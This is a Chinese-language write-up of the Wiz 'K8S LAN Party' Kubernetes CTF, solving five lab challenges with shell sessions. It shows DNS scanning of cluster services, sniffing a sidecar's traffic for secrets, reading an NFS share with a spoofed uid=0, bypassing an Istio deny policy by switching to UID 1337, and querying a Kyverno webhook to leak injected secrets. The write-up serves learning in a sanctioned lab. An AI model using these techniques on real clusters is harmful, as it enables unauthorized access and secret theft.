K8S_LAN_PARTY_WriteUp

Background

地址

https://k8slanparty.com/

时间

March 20, 2024 6:30 PM - March 22, 2024 10:30 PM

Challenge 1:RECON

题目描述

As a warmup, utilize DNS scanning to uncover hidden internal services and obtain the flag. We have “loaded your machine with dnscan to ease this process for further challenges.

考点

  • DNScan
  • service to ip
  • curl

分析

  1. 点进 DNS scanning 的链接,映入眼帘:

We actually have access to a Kubernetes specific way to identify live services and sometimes pods in the form of the Kubernetes DNS service.

也就是说通过 DNS 来探测服务。

Service 被分配一个集群内可访问的 IP(Cluster IP) 地址,用于在集群内部将流量路由到对应 Pod,同时暴露端口到公网。与 Service 关联的 DNS 记录允许通过 Service 的名称来访问 Service。这些 DNS 记录由 DNS 解析器管理。

Pod 和 Service 的 DNS 名称会自动生成如下:

  • Pod:pod-ip-address.pod-namespace-name.pod.cluster-domain.example(例如 10.244.0.1.my-app.svc.cluster.local)
  • Service:service-name.service-namespace-name.svc.cluster-domain.example(例如 database.my-app.svc.cluster.local)
  1. 也就是说,思路是用 DNScan,通过环境变量里的 HOST_SERVER IP来反查对应的 Service。
1
2
3
4
5
6
7
8
9
10
player@wiz-k8s-lan-party:~$ env | grep HOST
KUBERNETES_SERVICE_HOST=10.100.0.1
player@wiz-k8s-lan-party:~$ dnscan -h
Usage of dnscan:
-subnet string
Input to scan, CIDR notation (e.g., 10.5.0.0/24) or wildcard (e.g., 10.5.0.*)
player@wiz-k8s-lan-party:~$ dnscan -subnet 10.100.0.1/16
34967 / 65536 [------------------------------------------------------------------------->________________________________________________________________] 53.36% 988 p/s10.100.136.254 getflag-service.k8s-lan-party.svc.cluster.local.
65415 / 65536 [----------------------------------------------------------------------------------------------------------------------------------------->] 99.82% 988 p/s10.100.136.254 -> getflag-service.k8s-lan-party.svc.cluster.local.
65536 / 65536 [-----------------------------------------------------------------------------------------------------------------------------------------] 100.00% 991 p/s

找到 service:getflag-service.k8s-lan-party.svc.cluster.local.

  1. 想了一下没想到后续利用,想到环境变量里面由开443端口。直接访问该 IP,也就是 service 名称 getflag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
player@wiz-k8s-lan-party:~$ env
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_SERVICE_PORT=443
USER_ID=063cd108-777e-421c-8c5b-ef053f624672
HISTSIZE=2048
PWD=/home/player
HOME=/home/player
KUBERNETES_PORT_443_TCP=tcp://10.100.0.1:443
HISTFILE=/home/player/.bash_history
TMPDIR=/tmp
TERM=xterm-256color
SHLVL=1
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.100.0.1
KUBERNETES_SERVICE_HOST=10.100.0.1
KUBERNETES_PORT=tcp://10.100.0.1:443
KUBERNETES_PORT_443_TCP_PORT=443
HISTFILESIZE=2048
_=/usr/bin/env

# 万能 curl
player@wiz-k8s-lan-party:~$ curl getflag-service.k8s-lan-party.svc.cluster.local
wiz_k8s_lan_party{between-thousands-of-ips-you-found-your-northen-star}

附录

https://mp.weixin.qq.com/s?__biz=MzkwMDQ4MDU2MA==&mid=2247484222&idx=1&sn=5a1b2d72398280542e75c5310c6b1d19&scene=21#wechat_redirect

Challenge 2:FINDING NEIGHBOURS

题目描述

Sometimes, it seems we are the only ones around, but we should always be on guard against invisible sidecars reporting sensitive secrets.

考点

  • sidecars(network)
  • netstat
  • tcpdump

分析

  1. 先点开 sidecars 看看怎么个事儿

Sidecar containers are the secondary containers that run along with the main application container within the same Pod These containers are used to enhance or to extend the functionality of the main application container by providing additional services, or functionality such as logging, monitoring, security, or data synchronization, without directly altering the primary application code.

相当于一个附属容器,提供附加、扩展功能

If an init container is created with itsrestartPolicyset toAlways, it willstart and remain running during the entire life of the Pod. This can be helpful for running supporting services separated from the main application containers.

配置 restartpolicy=Always 后 ,就会默认启动 sidecar 的功能并一直运行.

  1. Hint 1

Sidecar containers share the same lifecycle, resources, and network namespace with the primary container This co-location allows them to interact closely and share resources.

共用相同的 network 和存储命名空间。

  1. 信息搜集
  • service
1
2
player@wiz-k8s-lan-party:~$ dnscan -subnet 10.100.0.1/16
65395 / 65536 [->] 99.78% 988 p/s10.100.171.123 -> reporting-service.k8s-lan-party.svc.cluster.local.
  • network
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
player@wiz-k8s-lan-party:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: tunl0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
link/ipip 0.0.0.0 brd 0.0.0.0
2113: ns-252e81@if2114: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether 06:27:94:7c:7d:aa brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 192.168.8.215/31 scope global ns-252e81
valid_lft forever preferred_lft forever
inet6 fe80::427:94ff:fe7c:7daa/64 scope link
valid_lft forever preferred_lft forever
  • netstat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
player@wiz-k8s-lan-party:~$ netstat -ano 
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 192.168.8.215:45366 10.100.171.123:80 TIME_WAIT timewait (30.31/0/0)
tcp 0 0 192.168.8.215:34758 10.100.171.123:80 TIME_WAIT timewait (50.36/0/0)
tcp 0 0 192.168.8.215:39366 10.100.171.123:80 TIME_WAIT timewait (40.44/0/0)
tcp 0 0 192.168.8.215:36266 10.100.171.123:80 TIME_WAIT timewait (20.28/0/0)
tcp 0 0 192.168.8.215:43638 10.100.171.123:80 TIME_WAIT timewait (15.27/0/0)
tcp 0 0 192.168.8.215:34772 10.100.171.123:80 TIME_WAIT timewait (50.46/0/0)
tcp 0 0 192.168.8.215:45368 10.100.171.123:80 TIME_WAIT timewait (35.33/0/0)
tcp 0 0 192.168.8.215:34786 10.100.171.123:80 TIME_WAIT timewait (55.48/0/0)
tcp 0 0 192.168.8.215:34780 10.100.171.123:80 TIME_WAIT timewait (55.38/0/0)
tcp 0 0 192.168.8.215:39376 10.100.171.123:80 TIME_WAIT timewait (45.45/0/0)
tcp 0 0 192.168.8.215:42832 10.100.171.123:80 TIME_WAIT timewait (5.24/0/0)
tcp 0 0 192.168.8.215:39370 10.100.171.123:80 TIME_WAIT timewait (45.35/0/0)
tcp 0 0 192.168.8.215:42820 10.100.171.123:80 TIME_WAIT timewait (0.23/0/0)
tcp 0 0 192.168.8.215:36274 10.100.171.123:80 TIME_WAIT timewait (25.30/0/0)
tcp 0 0 192.168.8.215:39362 10.100.171.123:80 TIME_WAIT timewait (40.34/0/0)
tcp 0 0 192.168.8.215:43626 10.100.171.123:80 TIME_WAIT timewait (10.26/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path

本地的192.168.8.215 一直向 10.100.171.123:80 通信

  1. 好吧,看了wp,直接 tcpdump 捕获流量详细看看通信细节。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
player@wiz-k8s-lan-party:~$ tcpdump host 10.100.171.123  -w 1.pcap
tcpdump: listening on ns-252e81, link-type EN10MB (Ethernet), snapshot length 262144 bytes
^C30 packets captured
30 packets received by filter
0 packets dropped by kernel
player@wiz-k8s-lan-party:~$ cat 1.pcap
Ôò¡ïýe«¾
JJ>òVA4#'|}E<6y@EäÀ×
d«{²¢P+SP´
\\Iïýe³À
JJ'|}ª>òVA4E<@|]
d«{À×P²¢»­Ë+SPþ´
¡îù\\Iïýe¾À
BB>òVA4#'|}E46z@EëÀ×
d«{²¢P+SP­Ìö

\\I¡îùïýeìÀ
>òVA4#'|}E
6{@EÀ×
d«{²¢P+SP­Ìö[
\\I¡îùPOST / HTTP/1.1
Host: reporting-service
User-Agent: curl/7.64.0
Accept: */*
Content-Length: 63
Content-Type: application/x-www-form-urlencoded

wiz_k8s_lan_party{good-crime-comes-with-a-partner-in-a-sidecar}ïýeÂ
BB'|}ª>òVA4E4á@â
d«{À×P²¢»­Ì+SQtü

¡îú\\IïýeëÊ
'|}ª>òVA4Eá@
d«{À×P²¢»­Ì+SQtüR
¡îü\\IHTTP/1.1 200 OK
server: istio-envoy
date: Fri, 22 Mar 2024 05:11:11 GMT
content-type: text/plain
x-envoy-upstream-service-time: 1
x-envoy-decorator-operation: :0/*
transfer-encoding: chunked

0

wiz_k8s_lan_party{good-crime-comes-with-a-partner-in-a-sidecar}

Challenge 3:DATA LEAKAGE

题目描述

Exposed File Share

The targeted big corp utilizes outdated, yet cloud-supported technology for data storage in production. But oh my, this technology was introduced in an era when access control was only network-based 🤦‍️.

Hint

1
你可能会发现查看 nfs-cat 和 nfs-ls 的文档很有用。

考点

  • Network File System(NFS)
  • mount
  • nfs-cat、nfs-ls

分析

  1. nfs-catnfs-ls

    关注描述里的:”this technology was introduced in an era when access control was only network-based”,和提示给的 nfs-catnfs-ls

  2. NFS

NFS,是 Network File System 的简写,即网络文件系统。网络文件系统是FreeBSD支持的文件系统中的一种,也被称为NFS. NFS允许一个系统在网络上与他人共享目录和文件。 通过使用NFS,用户和程序可以像访问本地文件一样访问远端系统上的文件。

就是一个数据存储服务器或者服务,跟主机之间通过 nfs 来通信,主要是挂载。

  1. 查看 mount

1
2
player@wiz-k8s-lan-party:/var/run/secrets$ mount | grep nfs    
fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com:/ on /efs type nfs4 (ro,relatime,vers=4.1,rsize=1048576,wsize=1048576,namlen=255,hard,noresvport,proto=tcp,timeo=600,retrans=2,sec=sys,clientaddr=192.168.4.189,local_lock=none,addr=192.168.124.98)

发现好东西,这不得看看怎么个事儿。

GPT 解释:

  • fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com: 这是一个 NFS 文件系统的远程服务器地址。NFS(Network File System)是一种网络文件系统协议,允许远程计算机通过网络共享文件。
  • :/: 这表示将远程文件系统的根目录挂载到本地目录。冒号之前是远程服务器的地址和共享的路径,冒号之后是挂载点。
  • /efs: 这是本地文件系统的挂载点。在本例中,远程 NFS 文件系统的根目录将会被挂载到本地的 /efs 目录。
  1. 发现 flag

1
2
3
4
5
player@wiz-k8s-lan-party:/var/run/secrets$ cd /efs
player@wiz-k8s-lan-party:/efs$ ls
flag.txt
player@wiz-k8s-lan-party:/efs$ cat flag.txt
cat: flag.txt: Permission denied

呵呵呵

想到hint里的 nfs-catnfs-ls

nfs-catnfs-ls 是 NFS (Network File System) 的一些常见工具,用于从 NFS 服务器上读取文件内容和列出目录内容。这些工具通常需要在客户端上安装并配置 NFS 客户端来使用。学学规则,执行:

1
$ nfs-cat 'nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com/flag.txt'

不知道是我的问题还是nfs server 挂了,连不上。服了

好吧:格式还是好好看清楚,还要加传参

1
2
player@wiz-k8s-lan-party:~$ nfs-cat 'nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4.1&uid=0'
wiz_k8s_lan_party{old-school-network-file-shares-infiltrated-the-cloud!}

Challenge 4:BYPASSING BOUNDARIES

题目描述

The Beauty and The Ist

Apparently, new service mesh technologies hold unique appeal for ultra-elite users (root users). Don’t abuse this power; use it responsibly and with caution.

hint Try examining Istio's [IPTables rules](<https://github.com/istio/istio/wiki/Understanding-IPTables-snapshot#use-pid-to-get-iptables>).

题目给的 policy

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
name: istio-get-flag
namespace: k8s-lan-party
spec:
action: DENY
selector:
matchLabels:
app: "{flag-pod-name}"
rules:
- from:
- source:
namespaces: ["k8s-lan-party"]
to:
- operation:
methods: ["POST", "GET"]

浅浅问一波 gpt:这个 AuthorizationPolicy 定义了一个访问控制策略,拒绝具有特定标签的应用程序(”{flag-pod-name}”)的请求,同时只允许来自 k8s-lan-party 命名空间的 POST 和 GET 请求访问目标资源。

考点

  • Istio
  • IPTables
  • PID/UID/GID

分析

  1. 打开靶场给的 root 很难不让我想到逃逸。哈哈。
  2. 先学一下 hint 里面的 lstioiptabl

lstio

它是一个完全开源的服务网格,以透明层的方式构建在现有分布式应用中。它也是一个提供了各种API的平台,可以与任何日志平台、监控系统或策略系统集成。Istio的多样化特性可以让你高效地运行分布式微服务架构,并提供一种统一的方式来保护、连接和监控微服务

iptabl

iptables 是 Linux 内核中的防火墙软件 netfilter 的管理工具,位于用户空间,同时也是 netfilter 的一部分。Netfilter 位于内核空间,不仅有网络地址转换的功能,也具备数据包内容修改、以及数据包过滤等防火墙功能。

iptable 中一共有五张表,分别负责不同的方向(数据包、防火墙、网络地址转换、数据包修改、访问控制),不同地方表具有的链路(输入输出等)也不同。

filtter 表为例:

1
2
3
4
5
6
7
$ iptables -L -v
Chain INPUT (policy ACCEPT 350K packets, 63M bytes)
pkts bytes target prot opt in out source destination
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 18M packets, 1916M bytes)
pkts bytes target prot opt in out source destination

看到三个默认的链,分别是 INPUT、FORWARD 和 OUTPUT,每个链中的第一行输出表示链名称(在本例中为 INPUT/FORWARD/OUTPUT),后跟默认策略(ACCEPT)。

每条链中都可以添加多条规则,规则是按照顺序从前到后执行的。看下规则的表头定义。

  • pkts:处理过的匹配的报文数量
  • bytes:累计处理的报文大小(字节数)
  • target:如果报文与规则匹配,指定目标就会被执行。
  • prot:协议,例如 tdpudpicmpall
  • opt:很少使用,这一列用于显示 IP 选项。
  • in:入站网卡。
  • out:出站网卡。
  • source:流量的源 IP 地址或子网,或者是 anywhere
  • destination:流量的目的地 IP 地址或子网,或者是 anywhere

信息搜集

  • service:dnscan 扫描
1
istio-protected-pod-service.k8s-lan-party.svc.cluster.local.

命名空间没问题,问题在于被拒绝了:具有特定标签 {flag-pod-name} 的应用程序(”istio-protected-pod-service“)的请求

hint 分析

关键概念:Magic constants

1337 - uid and gid used to distinguish between traffic originating from proxy vs the applications.

重要的就是

Outbound bypass

  • If you observe the iptables rules above, you will see a magic number (1337) appear several times. This is the uid/gid of the running proxy which is used by iptables to differentiate between packets originating from the proxy and the ones originating from the application. When packets originate from the application, they must be redirected to proxy to implement a service mesh. When packets originate from the proxy, they \*must not\* be redirected as doing so will cause an infinite loop.

This can cause multiple issues.

If the cluster is not mTLS, the outbound policies could be bypassed such as Data leak prevention

验证

查看 UID

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@wiz-k8s-lan-party:~# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
_rpc:x:102:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:103:65534::/var/lib/nfs:/usr/sbin/nologin
istio:x:1337:1337::/home/istio:/bin/sh
player:x:1001:1001::/home/player:/bin/sh

发现亮点:istio:x:1337:1337::/home/istio:/bin/sh ,root(也就是当前用户)UID和GID为 1337

根据:https://github.com/istio/istio/issues/4286

我们直接切这个用户然后就可以绕过 deny

1
2
3
4
5
root@wiz-k8s-lan-party:~# su istio
$ id
uid=1337(istio) gid=1337(istio) groups=1337(istio)
$ curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local
wiz_k8s_lan_party{only-leet-hex0rs-can-play-both-k8s-and-linux}$

challenge 5:LATERAL MOVEMENT

题目描述

Who will guard the guardians?

Where pods are being mutated by a foreign regime, one could abuse its bureaucracy and leak sensitive information from the administrative services.

Hint

Need a hand crafting AdmissionReview requests? Checkout https://github.com/anderseknert/kube-review.

Policy

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
apiVersion: kyverno.io/v1
kind: Policy
metadata:
name: apply-flag-to-env
namespace: sensitive-ns
spec:
rules:
- name: inject-env-vars
match:
resources:
kinds:
- Pod
mutate:
patchStrategicMerge:
spec:
containers:
- name: "*"
env:
- name: FLAG
value: "{flag}"

考点

  • Dynamic Admission Control
    • admission webhooks
    • AdmissionReview

分析

  1. 学习题目描述和 hint

Webhook request and response

  • webhooks can specify what versions of AdmissionReview objects they accept with the admissionReviewVersions field in their configuration

就是一套请求响应体系。不能直接发请求,需要加上 JSON 构造一个合法请求。

When allowing a request, a mutating admission webhook may optionally modify the incoming object as well. This is done using thepatch andpatchType fields in the response. The only currently supported patchType is JSONPatch.For patchType: JSONPatch, the patch field contains a base64-encoded array of JSON patch operations.

  1. 信息搜集

Service

1
2
3
4
5
6
7
kyverno-cleanup-controller.kyverno.svc.cluster.local.
player@wiz-k8s-lan-party:~$ dnscan -subnet 10.100.0.1/16
10.100.126.98 -> kyverno-svc-metrics.kyverno.svc.cluster.local.
10.100.158.213 -> kyverno-reports-controller-metrics.kyverno.svc.cluster.local.
10.100.171.174 -> kyverno-background-controller-metrics.kyverno.svc.cluster.local.
10.100.217.223 -> kyverno-cleanup-controller-metrics.kyverno.svc.cluster.local.
10.100.232.19 -> kyverno-svc.kyverno.svc.cluster.local.

没懂啥意思,但是就是直接请求给的policy 转换的JSON,然后就返回patch了。

1
2
player@wiz-k8s-lan-party:~$ curl -k -X POST <https://kyverno-svc.kyverno.svc.cluster.local>./mutate -H "Content-Type: application/json" --data '{"apiVersion":"admission.k8s.io/v1","kind":"AdmissionReview","request":{"uid":"2024ee9c-c374-413c-838d-e62bcb4826be","kind":{"group":"","version":"v1","kind":"Pod"},"resource":{"group":"","version":"v1","resource":"pods"},"requestKind":{"group":"","version":"v1","kind":"Pod"},"requestResource":{"group":"","version":"v1","resource":"pods"},"name":"example-pod","namespace":"sensitive-ns","operation":"CREATE","userInfo":{"username":"psych","uid":"xxx","groups":["system:authenticated"]},"object":{"apiVersion":"v1","kind":"Pod","metadata":{"name":"psych-pod","namespace":"sensitive-ns"},"spec":{"containers":[{"name":"psych-container","image":"nginx","env":[{"name":"FLAG","value":"{flag}"}]}]}},"oldObject":null,"options":{"apiVersion":"meta.k8s.io/v1","kind":"CreateOptions"},"dryRun":true}}'
{"kind":"AdmissionReview","apiVersion":"admission.k8s.io/v1","request":{"uid":"2024ee9c-c374-413c-838d-e62bcb4826be","kind":{"group":"","version":"v1","kind":"Pod"},"resource":{"group":"","version":"v1","resource":"pods"},"requestKind":{"group":"","version":"v1","kind":"Pod"},"requestResource":{"group":"","version":"v1","resource":"pods"},"name":"example-pod","namespace":"sensitive-ns","operation":"CREATE","userInfo":{"username":"psych","uid":"xxx","groups":["system:authenticated"]},"object":{"apiVersion":"v1","kind":"Pod","metadata":{"name":"psych-pod","namespace":"sensitive-ns"},"spec":{"containers":[{"name":"psych-container","image":"nginx","env":[{"name":"FLAG","value":"{flag}"}]}]}},"oldObject":null,"dryRun":true,"options":{"apiVersion":"meta.k8s.io/v1","kind":"CreateOptions"}},"response":{"uid":"2024ee9c-c374-413c-838d-e62bcb4826be","allowed":true,"patch":"W3sib3AiOiJyZXBsYWNlIiwicGF0aCI6Ii9zcGVjL2NvbnRhaW5lcnMvMC9lbnYvMC92YWx1ZSIsInZhbHVlIjoid2l6X2s4c19sYW5fcGFydHl7eW91LWFyZS1rOHMtbmV0LW1hc3Rlci13aXRoLWdyZWF0LXBvd2VyLXRvLW11dGF0ZS15b3VyLXdheS10by12aWN0b3J5fSJ9LCB7InBhdGgiOiIvbWV0YWRhdGEvYW5ub3RhdGlvbnMiLCJvcCI6ImFkZCIsInZhbHVlIjp7InBvbGljaWVzLmt5dmVybm8uaW8vbGFzdC1hcHBsaWVkLXBhdGNoZXMiOiJpbmplY3QtZW52LXZhcnMuYXBwbHktZmxhZy10by1lbnYua3l2ZXJuby5pbzogcmVwbGFjZWQgL3NwZWMvY29udGFpbmVycy8wL2Vudi8wL3ZhbHVlXG4ifX1d","patchType":"JSONPatch"}}

W3sib3AiOiJyZXBsYWNlIiwicGF0aCI6Ii9zcGVjL2NvbnRhaW5lcnMvMC9lbnYvMC92YWx1ZSIsInZhbHVlIjoid2l6X2s4c19sYW5fcGFydHl7eW91LWFyZS1rOHMtbmV0LW1hc3Rlci13aXRoLWdyZWF0LXBvd2VyLXRvLW11dGF0ZS15b3VyLXdheS10by12aWN0b3J5fSJ9LCB7InBhdGgiOiIvbWV0YWRhdGEvYW5ub3RhdGlvbnMiLCJvcCI6ImFkZCIsInZhbHVlIjp7InBvbGljaWVzLmt5dmVybm8uaW8vbGFzdC1hcHBsaWVkLXBhdGNoZXMiOiJpbmplY3QtZW52LXZhcnMuYXBwbHktZmxhZy10by1lbnYua3l2ZXJuby5pbzogcmVwbGFjZWQgL3NwZWMvY29udGFpbmVycy8wL2Vudi8wL3ZhbHVlXG4ifX1d base64decode

1
[{"op":"replace","path":"/spec/containers/0/env/0/value","value":"wiz_k8s_lan_party{you-are-k8s-net-master-with-great-power-to-mutate-your-way-to-victory}"}, {"path":"/metadata/annotations","op":"add","value":{"[policies.kyverno.io/last-applied-patches":"inject-env-vars.apply-flag-to-env.kyverno.io:](<http://policies.kyverno.io/last-applied-patches%22:%22inject-env-vars.apply-flag-to-env.kyverno.io:>) replaced /spec/containers/0/env/0/value\\n"}}]